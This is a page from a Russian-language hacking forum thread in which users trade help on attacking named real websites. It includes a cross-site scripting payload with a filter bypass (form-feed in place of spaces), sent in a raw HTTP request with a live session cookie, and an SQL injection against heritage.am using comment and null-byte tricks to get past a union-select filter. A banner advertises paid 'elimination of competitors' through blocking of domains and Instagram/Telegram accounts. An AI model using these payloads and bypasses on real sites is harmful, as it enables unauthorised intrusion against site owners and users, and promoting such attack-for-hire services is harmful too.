Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 30 из 296

« Первая

130

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#291

06.07.2015, 15:13

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

Цитата:

Сообщение от man4747

↑
страница изменяется
http://www.air.am/en/your-itinerary/15/
=>
http://www.air.am/en/your-itinerary/15'/

http://www.air.am/en/your-itinerary/15kj/ - так же изменяется, и кавычка тут непричем

#292

07.07.2015, 00:17

ocheretko

Новичок

Регистрация: 15.05.2010

Сообщений: 0

С нами: 8417383

Репутация: 0

Код:

">

Чтобы сработала XSS осталось добится, чтобы вставился пробел вмежду тегами img srcset. Символы \ и / заменяются на %20. Подскажите куда можно еще копать?

#293

07.07.2015, 01:18

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от ocheretko

↑

Код:

">

где сам инъект? на что там waf?

#294

07.07.2015, 01:24

ocheretko

Новичок

Регистрация: 15.05.2010

Сообщений: 0

С нами: 8417383

Репутация: 0

Вывод

">

Что Вы имеете ввиду под вопросом "где сам инъект?".

waf на пробелы и слешы. Слешы черт с ним, а вот пробелы - не могу разделить атрибут от тега

#295

07.07.2015, 02:02

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от ocheretko

↑
Вывод
">
Что Вы имеете ввиду под вопросом "где сам инъект?".
waf на пробелы и слешы. Слешы черт с ним, а вот пробелы - не могу разделить атрибут от тега

как вариант: %0C

POC: http://jsfiddle.net/4qgk5qyj/

#296

07.07.2015, 04:01

ocheretko

Новичок

Регистрация: 15.05.2010

Сообщений: 0

С нами: 8417383

Репутация: 0

Код:

">

%0C так и остается в исходном коде, также как и пробел заменяется на %20

#297

07.07.2015, 09:24

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от ocheretko

↑

Код:

">

%0C так и остается в исходном коде, также как и пробел заменяется на %20

отправьте данные через сниффер, например burp. и скиньте уже сайт в лс

#298

07.07.2015, 13:29

ocheretko

Новичок

Регистрация: 15.05.2010

Сообщений: 0

С нами: 8417383

Репутация: 0

Код:

GET /search/%22%3E%3Cimg%20srcset%3D%22%2C%2C%2C%2C%2Cx%22onerror%3D%22alert(1)%22%3E HTTP/1.1
Host: *********
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: *********
Cookie: PHPSESSID=p7f3b38uuh1icqqqndscb75a10; Lang=ru; ShopID=37; __utma=244353110.90581892.1436196504.1436227051.1436260016.5; __utmc=244353110; __utmz=244353110.1436196504.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jv_enter_ts_dUv23LxxhD=1436196515709; jv_visits_count_dUv23LxxhD=1; jv_pages_count_dUv23LxxhD=107; jv_gui_state_dUv23LxxhD=WIDGET; jv_cm_dUv23LxxhD=ws; jv_client_id_dUv23LxxhD=242556.2oZiZbl%2Bz3jZ%2Fn3i7hwsPj8u5Hm4%2Byfv2aQVwObJGqY; jv_invitation_time_dUv23LxxhD=1436260532076; jv_close_time_dUv23LxxhD=1436220689308; __utmb=244353110.14.9.1436260532079; _ym_visorc_20996566=w; jv_sess_id_dUv23LxxhD=sbd62ebf98ea95eb5d817667c74a59689; __utmt=1
Connection: keep-alive

#299

08.07.2015, 15:34

lindau

Новичок

Регистрация: 08.07.2015

Сообщений: 2

С нами: 5710646

Репутация: 0

Привет всем! Подскажите тут есть скуль?

http://www.heritage.am/ru/component/...+order+by+1--+

http://www.heritage.am/ru/component/...order+by+10--+

Там по моему фильтр на Union select стоит, не могу обойти никак

#300

08.07.2015, 16:37

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

С нами: 9721141

Репутация: 1013

Цитата:

Сообщение от lindau

↑
Привет всем! Подскажите тут есть скуль?
http://www.heritage.am/ru/component/...+order+by+1--+
http://www.heritage.am/ru/component/...order+by+10--+
Там по моему фильтр на Union select стоит, не могу обойти никак

увы, вывода нет.

Код:

http://www.heritage.am/ru/component/blog_calendar/?year=2015&month=02&day=13&modid=61+and+1=2/*%00*/union+select+6666666666--+

Страница 30 из 296

« Первая

130

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Внести депозит

Депозит создан

Вывести депозит